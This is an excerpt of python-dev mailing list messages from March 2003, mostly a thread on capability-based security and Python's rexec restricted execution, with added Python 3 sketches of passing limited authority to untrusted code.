Alice has both the authority to use Carol and the authority to extend 
authorities to Bob.

Those two sentences above (and equivalently the graph) completely define 
capabilities, in the abstract.  They don't say how they are implemented.  A 
particular implementation that I find deeply appealing is to make "has a 
reference to 'open'" be the determiner of whether a thing has the authority to 
use "open", and to make "has a reference to X" be the determiner of whether a 
thing has the authority to extend authorities to X.  That's "unifying 
designation with authority", and that's what the E language does.
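
The Alice/Bob/Carol rule can be sketched with ordinary object references.
The classes below are hypothetical stand-ins for the circles in the diagram,
and the sketch assumes that holding a reference is the only way to reach an
object, which plain Python does not guarantee.

```python
class Carol:
    """The resource; stands in for something like the real open()."""

    def use(self):
        return "carol used"


class Bob:
    def __init__(self):
        self.carol = None  # Bob starts with no authority over Carol

    def receive(self, carol):
        self.carol = carol  # holding the reference is the authority

    def act(self):
        if self.carol is None:
            raise PermissionError("Bob holds no reference to Carol")
        return self.carol.use()


class Alice:
    """Alice holds references to both Carol and Bob."""

    def __init__(self, carol, bob):
        self.carol = carol
        self.bob = bob

    def introduce(self):
        # Only someone holding both references can make this call.
        self.bob.receive(self.carol)


carol, bob = Carol(), Bob()
alice = Alice(carol, bob)

try:
    bob.act()
    before = "allowed"
except PermissionError:
    before = "denied"

alice.introduce()
after = bob.act()
```

There is no separate policy table here: the single call in introduce() both
names Carol and conveys the right to use her.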


> But I think "this code can't use ZipFile" is the wrong thing to say.
> You should only have to say "this code can't write files" (or
> something more specific).

I agree.  I incorrectly inferred from previous messages that the current problem 
under discussion was allowing or denying access to the ZipFile class.  But 
whatever resource we wish to control access to, these same techniques will 
apply.

> > In a system where designation is not unified with authority, you
> > tell this untrusted code "I want you to do this action X.", and then
> > you also have to go update the policy specification to say that the
> > code in question is allowed to do the action X.
> 
> Sorry, you've lost me here.  Which part is the "designation" (new word
> for me) and which part is the "authority"?

Sorry.  First let me point out that the issue of unifying designation with 
authority is separable from "the capability access control rule" described 
above.  The two have good synergy, but aren't identical.

By "designation" I meant "naming".  For example...  Let's see, I think I'll go 
back to my toy tictactoe example from [2].

In the tictactoe example, you have to specify which wxWindow the tictactoe game 
object should draw into.  This is "designation" -- you pass a reference, which 
designates which specific window you are talking about.  If you use the 
principle of unifying designation and authority, then this same act -- passing a 
reference to this particular wxWindow object -- conveys both the identification 
of which window to draw into and the authority to draw into it.

# access control system with unified designation and authority
game = TicTacToeGame()
game.display(wxPython.wxWindow())

If you have separate designation and authority, then the same code has to look 
something like this:

# access control system with separate designation and authority
game = TicTacToeGame()
window = wxPython.wxWindow()
def policy(subject, resource, operation):
    if ((subject is game) and (resource is window) and
            (operation == "invoke methods of")):
        return True
    return False
rexec.register_policy_hook(policy)
game.display(window)

This is what I call "say it twice if you really mean it".

Hm.  Reviewing the rexec docs, I begin to suspect that the "access control 
system with unified designation and authority" *is* how Python does access 
control in restricted mode, and that rexec itself is just to manage module 
import and certain dangerous builtins.


> It really sounds to me like at least one of our fundamental (?)
> differences is the autonomicity of code units.  I think of code (at
> least Python code) as a passive set of instructions that has no
> inherent authority but derives authority from the built-ins passed to
> it; you seem to describe code as having inherent authority.

I definitely don't intend for code to have inherent authority (other than the 
Trusted Code Base -- the interpreter -- which can't help but have it).  The 
"things" in my two-sentence definition (the white circles in the diagram) are 
"computational things that can have state and behavior".  (This includes Python 
objects, closures, stack frames, etc...  In another context I would call them 
"objects", but Python uses the word "object" for something more specific -- an 
instance of a class.)

> > This would be effectively the "virtualization" of access control.  I
> > regard it as a kind of holy Grail for internet computing.
> 
> How practical is this dream?  How useful?

Let's revisit the issue once we understand one another's access control schemes.
;-)

Regards,

Zooko

[1] http://www.erights.org/elib/capability/ode/overview.html
[2] http://mail.python.org/pipermail/python-dev/2003-March/033938.html

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links


From guido@python.org  Mon Mar 31 22:43:09 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 31 Mar 2003 17:43:09 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 31 Mar 2003 17:22:41 EST."
 <E1907fu-0007r9-00@localhost>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org> <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net> <E1903R1-0005sc-00@localhost> <200303311944.h2VJhsA16638@odiug.zope.com>
 <E1907fu-0007r9-00@localhost>
Message-ID: <200303312243.h2VMhCC24639@odiug.zope.com>

[Zooko]
> It's apparent that I didn't explain capabilities clearly enough.
> Also I misunderstood something about rexec in general and ZipFile in
> particular.  Once we succeed at understanding each other, I'll then
> inquire whether you agree with my Big Word Proofs.

It's apparent that you don't understand rexec well enough; I'll try to
explain.

> (I, Zooko, wrote lines prepended with "> > ".)
> 
>  Guido wrote:
> >
> > > So in the "separate policy language" way of life, access to the
> > > ZipFile class gives you the ability to open files anywhere in the
> > > filesystem.  The ZipFile class therefore has the "dangerous" flag
> > > set, and when you run code that you think might misuse this feature,
> > > you set the "can't use dangerous things" flag on that code.
> > 
> > But that's not how rexec works.  In the rexec world, the zipfile
> > module has no special privileges; when it is imported by untrusted
> > code, it is reloaded from disk as if it were untrusted itself.  The
> > zipfile.ZipFile class is a client of "open", an implementation of
> > which is provided to the untrusted code by the trusted code.
> 
> <Zooko reads the zipfile module docs.>
> 
> How is the implementation of "open" provided by the trusted code to
> the untrusted code?  Is it possible to provide a different "open"
> implementation to different "instances" of the zipfile module?  (I
> think not, as there is no such thing as "a different instance of a
> module", but perhaps you could have two rexec "workspaces" each of
> which has a zipfile module with a different "open"?)

To the contrary, it is very easy to provide code with a different
version of open().  E.g.:

  # this executes as trusted code
  def my_open(...):
    "open() variant that only allows reading"
  my_builtins = {"len": len, "open": my_open, "range": range, ...}
  namespace = {"__builtins__": my_builtins}
  exec "..." in namespace

The final exec executes the untrusted code string "..." in a
restricted environment where the built-in 'open' refers to my_open.
Because import statements are also treated this way (they call the
builtin function __import__), the same applies for import.  IOW,
namespace["__builtins__"] acts as the set of "root capabilities" given
to the untrusted code.
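
For readers on current Python, here is a runnable sketch of the same
technique.  It assumes Python 3, where exec is a function and the rexec
module no longer exists; read_only_open and the sample untrusted string are
hypothetical, and a custom __builtins__ table is not by itself a secure
sandbox, since introspection can reach the real builtins.

```python
import builtins
import os
import tempfile


def read_only_open(path, mode="r", *args, **kwargs):
    """open() variant that only allows reading."""
    if any(flag in mode for flag in "wax+"):
        raise PermissionError("this workspace may only read files")
    return builtins.open(path, mode, *args, **kwargs)


# The "root capabilities" handed to the untrusted code.
my_builtins = {"len": len, "range": range, "open": read_only_open,
               "PermissionError": PermissionError}
namespace = {"__builtins__": my_builtins}

# Stand-in for the untrusted code string.
untrusted = '''
try:
    open(path, "w")
    outcome = "wrote"
except PermissionError:
    outcome = "refused"
with open(path) as f:
    text = f.read()
'''

with tempfile.TemporaryDirectory() as d:
    path = os.path.join(d, "data.txt")
    with open(path, "w") as f:   # trusted code uses the real open()
        f.write("hello")
    namespace["path"] = path
    exec(untrusted, namespace)
```

Afterwards namespace["outcome"] is "refused" and namespace["text"] is
"hello": the name 'open' inside the string resolved to read_only_open, not
to the real built-in.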

> > > In this scheme, there are no flags, and when you run code that
> > > you think might misuse this feature, you simply don't give that
> > > code a reference to the ZipFile class.  (Also, we have to
> > > arrange that it can't acquire a reference by "import zipfile".)
> > 
> > The rexec world solves this very nicely IMO.  Can't the capability
> > world do it the same way?  The only difference might be that
> > 'open' would have to be a capability.
> 
> I don't understand exactly how rexec works yet, but so far it sounds
> like capabilities.

Yes.  That may be why the demand for capabilities has been met with
resistance: to quote the French in "Monty Python and the Holy Grail",
"we already got one!" :-)

> Here's a two sentence definition of capabilities:

I've heard too many of these.  They are all too abstract.

> Authority originates in C code (in the interpreter or C extension
> modules), and is passed from thing to thing.

This part I like.

> A given thing "X" -- an instance of ZipFile, for example -- has the
> authority to use a given authority -- to invoke the real open(), for
> example -- if and only if some thing "Y" previously held both the
> "open()" authority and the "authority to extend authorities to X"
> authority, and chose to extend the "open()" authority to X.

But the instance of ZipFile is not really a protection domain.
Methods on the instance may have different authority.

> That rule could be enforced with the rexec system, right?

Yes, except that there are currently design bugs (starting in Python
2.2) that open holes; see Samuele Pedroni's posts here.

> Here is a graphical representation of this rule.  (Taken from [1].)
> 
> http://www.erights.org/elib/capability/ode/images/fundamental.gif
> 
> In the diagram, the authority is "Carol", the thing that started
> with the authority is "Alice", and Alice is in the process of
> extending to Bob the authority to use Carol.  This act -- the
> extending of authority from Alice to Bob -- is the only way that Bob
> can gain authority, and it can only happen if Alice has both the
> authority to use Carol and the authority to extend authorities to
> Bob.

Sure.  The question is, what exactly are Alice, Bob and Carol?  I
claim that they are not specific class instances but they are each a
"workspace" as I tried to explain before.  A workspace is more or less
the contents of a particular "sys.modules" dictionary.

> Those two sentences above (and equivalently the graph) completely
> define capabilities, in the abstract.  They don't say how they are
> implemented.  A particular implementation that I find deeply
> appealing is to make "has a reference to 'open'" be the determiner
> of whether a thing has the authority to use "open", and to make "has
> a reference to X" be the determiner of whether a thing has the
> authority to extend authorities to X.  That's "unifying designation
> with authority", and that's what the E language does.

Yes.  And then "has a reference to 'open'" is bootstrapped by sticking
(some variant of) 'open' in the __builtin__ module of a particular
"workspace".  (Note that workspace is a term I'm inventing here, you
won't find it in the Python literature.)

> > But I think "this code can't use ZipFile" is the wrong thing to
> > say.  You should only have to say "this code can't write files"
> > (or something more specific).
> 
> I agree.  I incorrectly inferred from previous messages that the
> current problem under discussion was allowing or denying access to
> the ZipFile class.  But whatever resource we wish to control access
> to, these same techniques will apply.
> 
> > > In a system where designation is not unified with authority, you
> > > tell this untrusted code "I want you to do this action X.", and
> > > then you also have to go update the policy specification to say
> > > that the code in question is allowed to do the action X.
> > 
> > Sorry, you've lost me here.  Which part is the "designation" (new
> > word for me) and which part is the "authority"?
> 
> Sorry.  First let me point out that the issue of unifying
> designation with authority is separable from "the capability access
> control rule" described above.  The two have good synergy, but
> aren't identical.
> 
> By "designation" I meant "naming".  For example...  Let's see, I
> think I'll go back to my toy tictactoe example from [2].
> 
> In the tictactoe example, you have to specify which wxWindow the
> tictactoe game object should draw into.  This is "designation" --
> you pass a reference, which designates which specific window you are
> talking about.  If you use the principle of unifying designation and
> authority, then this same act -- passing a reference to this
> particular wxWindow object -- conveys both the identification of
> which window to draw into and the authority to draw into it.
> 
> # access control system with unified designation and authority
> game = TicTacToeGame()
> game.display(wxPython.wxWindow())
> 
> If you have separate designation and authority, then the same code
> has to look something like this:
> 
> # access control system with separate designation and authority
> game = TicTacToeGame()
> window = wxPython.wxWindow()
> def policy(subject, resource, operation):
>     if (subject is game and resource is window
>             and operation == "invoke methods of"):
>         return True
>     return False
> rexec.register_policy_hook(policy)
> game.display(window)
> 
> This is what I call "say it twice if you really mean it".
> 
> Hm.  Reviewing the rexec docs, I begin to suspect that the "access
> control system with unified designation and authority" *is* how
> Python does access control in restricted mode, and that rexec itself
> is just to manage module import and certain dangerous builtins.

Yes.
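
The two styles quoted above can be contrasted in a runnable sketch.
Window, Game, PolicyGame, guarded_draw and the allowed set are all
hypothetical stand-ins (no wxPython, and no real rexec policy hook is
assumed); the point is only where the permission decision lives.

```python
class Window:
    """Stand-in for a window; records what was drawn into it."""

    def __init__(self):
        self.drawn = []

    def draw(self, shape):
        self.drawn.append(shape)


# Unified designation and authority: holding the reference is the permission.
class Game:
    def display(self, window):
        window.draw("grid")


window = Window()
Game().display(window)

# Separate designation and authority: the reference names the window,
# but a policy table has to agree before the call goes through.
allowed = set()  # (id(subject), id(resource)) pairs


def guarded_draw(subject, resource, shape):
    if (id(subject), id(resource)) not in allowed:
        raise PermissionError("policy does not allow this access")
    resource.draw(shape)


class PolicyGame:
    def display(self, window):
        guarded_draw(self, window, "grid")


policy_game = PolicyGame()
policy_window = Window()

try:
    policy_game.display(policy_window)   # designated, but not yet authorised
    denied = False
except PermissionError:
    denied = True

allowed.add((id(policy_game), id(policy_window)))   # "say it twice"
policy_game.display(policy_window)
```

In the first half nothing besides the reference has to be kept in sync;
in the second half the call fails until the policy table is updated to
match.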

> > It really sounds to me like at least one of our fundamental (?)
> > differences is the autonomicity of code units.  I think of code
> > (at least Python code) as a passive set of instructions that has
> > no inherent authority but derives authority from the built-ins
> > passed to it; you seem to describe code as having inherent
> > authority.
> 
> I definitely don't intend for code to have inherent authority (other
> than the Trusted Code Base -- the interpreter -- which can't help
> but have it).  The "things" in my two-sentence definition (the
> white circles in the diagram) are "computational things that can have
> state and behavior".  (This includes Python objects, closures, stack
> frames, etc...  In another context I would call them "objects", but
> Python uses the word "object" for something more specific -- an
> instance of a class.)
> 
> > > This would be effectively the "virtualization" of access control.  I
> > > regard it as a kind of holy Grail for internet computing.
> > 
> > How practical is this dream?  How useful?
> 
> Let's revisit the issue once we understand one another's access
> control schemes.
> ;-)
> 
> Regards,
> 
> Zooko
> 
> [1] http://www.erights.org/elib/capability/ode/overview.html
> [2] http://mail.python.org/pipermail/python-dev/2003-March/033938.html

I propose to continue this in a week; I'm leaving for Python UK right
now and expect to have scarce connectivity there if at all.  Back
Sunday night.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Mon Mar 31 22:49:29 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Mon, 31 Mar 2003 14:49:29 -0800 (PST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303312243.h2VMhCC24639@odiug.zope.com>
References: <Pine.LNX.4.33.0303301445260.22036-100000@server1.lfw.org>
 <200303310009.h2V09qx01754@pcp02138704pcs.reston01.va.comcast.net>
 <E1903R1-0005sc-00@localhost> <200303311944.h2VJhsA16638@odiug.zope.com>
 <E1907fu-0007r9-00@localhost>  <200303312243.h2VMhCC24639@odiug.zope.com>
Message-ID: <Pine.SOL.4.53.0303311447020.28740@death.OCF.Berkeley.EDU>

[Guido van Rossum]

> I propose to continue this in a week; I'm leaving for Python UK right
> now and expect to have scarce connectivity there if at all.  Back
> Sunday night.
>

Which means it will get summarized in *three* separate summaries.  This
thread will never die!!!  I am going to become a capabilities expert
whether I want to or not.  =)

-Brett


From greg@cosc.canterbury.ac.nz  Mon Mar 31 22:50:59 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 01 Apr 2003 10:50:59 +1200 (NZST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303311944.h2VJhsA16638@odiug.zope.com>
Message-ID: <200303312250.h2VMox816033@oma.cosc.canterbury.ac.nz>

> But that's not how rexec works.

It seems to me that the restricted execution mechanism (is there a
shorter term for this? calling it rexec is a misnomer, as has been
pointed out -- let's call it the REM for now) really is a kind of
capability system.

The REM works by closing off a bunch of loopholes and then controlling
which builtins a piece of code has access to.  That code can then pass
them on to other code or withhold them. Sounds a lot like
capabilities, doesn't it?

So the hypothesised "capability python" would be rather like having
REM permanently in effect...
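
A small sketch of "pass them on or withhold them", using plain closures
as stand-ins for capabilities.  All names here (make_logger, attenuate,
worker, helper, bystander) are hypothetical, and ordinary CPython
closures can be introspected, so this shows the programming style
rather than an enforced boundary.

```python
def make_logger(sink):
    """Create a capability that can append messages to `sink`."""
    def log(message):
        sink.append(message)
    return log


def attenuate(log, prefix):
    """Derive a narrower capability: every message is tagged with `prefix`."""
    def tagged(message):
        log(prefix + message)
    return tagged


def helper(log):
    # Can log only because its caller chose to hand it a capability.
    log("did something")


def bystander():
    # Was handed nothing, so it has no name through which to reach the sink.
    return None


def worker(log):
    log("worker started")
    helper(attenuate(log, "[helper] "))   # pass on a narrowed capability
    bystander()                           # withhold it entirely


sink = []
worker(make_logger(sink))
```

After the call, sink holds the worker's message followed by the
helper's tagged message; bystander contributed nothing because it was
never given a reference.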

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@v.loewis.de  Mon Mar 31 23:11:16 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 01 Apr 2003 01:11:16 +0200
Subject: [Python-Dev] iconv codec
In-Reply-To: <200303312210.h2VMAba24516@odiug.zope.com>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
 <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
 <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>
 <200303312210.h2VMAba24516@odiug.zope.com>
Message-ID: <m3d6k7t9m3.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> But given that it's only got a small audience, a 3rd party module
> would satisfy the need just as well, right?

The audience is actually quite large: any call to <unicodestr>.encode
could invoke this codec, if Python does not provide a builtin codec.

This includes, in particular, all CJK codecs.

Together with a platform-specific codec wrapper for Windows and OS X,
the need to package Python-specific CJK codecs (with the size and
maintenance issues that come with them) might vanish.
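
How such a fallback gets invoked can be sketched with the codec
registry's search functions.  This is not the iconv codec itself: the
encoding name "demofallback" is made up, and the search function simply
delegates to Latin-1 so that the example stays self-contained.

```python
import codecs


def fallback_search(name):
    """Codec search function: return a CodecInfo, or None if `name` is unknown."""
    if name == "demofallback":              # hypothetical encoding name
        base = codecs.lookup("latin-1")     # stand-in for a platform converter
        return codecs.CodecInfo(
            name="demofallback",
            encode=base.encode,
            decode=base.decode,
        )
    return None


# Registered search functions are tried when a codec is looked up by name.
codecs.register(fallback_search)

encoded = "caf\u00e9".encode("demofallback")
decoded = encoded.decode("demofallback")
```

Any .encode() or .decode() call with an otherwise unknown encoding name
ends up asking the registered search functions, which is why a wrapper
of this kind would be reachable from ordinary string code.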

Regards,
Martin


From ping@zesty.ca  Mon Mar 31 23:15:09 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 31 Mar 2003 17:15:09 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E8768BE.8010603@prescod.net>
Message-ID: <Pine.LNX.4.33.0303302001350.326-100000@server1.lfw.org>

On Sun, 30 Mar 2003, Paul Prescod wrote:
> I'm not clear (because I've been following the thread with half my
> brain, over quite a few days) whether you are making or have made some
> specific proposal. I guess you are proposing a restricted mode that
> would make this example actually secure as opposed to almost secure. Are
> you also proposing any changes to the syntax?

Not yet.  Although it's certainly tempting to propose syntax changes,
it makes more sense to really understand what we want first.  We can't
know that until we've actually tried programming in the capability style
in Python.  That's why i want to explore the possibilities and try these
exercises -- it will help us discover the shortest path from here to there.

> Also, is restricted mode an interpreter mode or is it scoped by module?

Whether restricted mode is activated depends on the __builtins__ of the
current namespace.  So the short answer is "by module".

> Yes, but why work around rather than fix? Is there a deep reason Python
> objects can't write to intermediate namespaces?

No.  There's just no syntax for it yet.  But let's figure out what we
can get away with first.

> > It would be cool if you could suggest little "security challenges"
> > to work through.  Given specific scenarios requiring things like
> > mutability or friend classes, i think trying to implement them in
> > this style could be very instructive.
>
> Unfortunately, most of the examples I can come up with seem to be hacks,
> workarounds and optimizations. It isn't surprising that sometimes you
> lose some efficiency or simplicity when working in a secure system.

Hmm, i'm not sure you understood what i meant.  The code example i posted
is a solution to the design challenge: "provide read-only access to a
directory and its subdirectories, but no access to the rest of the filesystem".
I'm looking for other security design challenges to tackle in Python.
Once enough of them have been tried, we'll have a better understanding of
what Python would need to do to make secure programming easier.
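
For readers without the earlier message at hand, here is one possible
shape for that design challenge.  It is a sketch written for
illustration, not the code posted earlier in the thread: make_reader
and its helpers are hypothetical names, and without a restricted
execution mode the closure variables remain reachable by introspection.

```python
import os


def make_reader(root):
    """Return (listdir, read) functions confined to `root` and its subdirectories."""
    root = os.path.realpath(root)

    def resolve(relative):
        # Normalise first, so ".." segments and symlinks cannot escape root.
        path = os.path.realpath(os.path.join(root, relative))
        if os.path.commonpath([root, path]) != root:
            raise PermissionError("path escapes the granted directory")
        return path

    def listdir(relative="."):
        return sorted(os.listdir(resolve(relative)))

    def read(relative):
        with open(resolve(relative), "rb") as handle:
            return handle.read()

    # Only reading operations are handed out; nothing here can write.
    return listdir, read
```

The caller receives two functions and nothing else: no path to the
rest of the filesystem and no way to open a file for writing through
them.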


-- ?!ng